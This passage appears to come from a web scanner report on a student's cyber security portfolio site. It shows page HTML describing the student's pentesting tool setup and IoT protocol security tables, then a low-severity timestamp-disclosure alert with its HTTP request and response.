          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          350400823
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        10. GET https://beekmans.dev
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          67108864, which evaluates to: 1972-02-16 18:21:04

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
